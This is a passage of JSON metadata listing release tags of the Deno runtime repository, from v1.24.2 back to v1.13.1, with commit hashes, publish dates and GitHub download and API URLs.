releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.e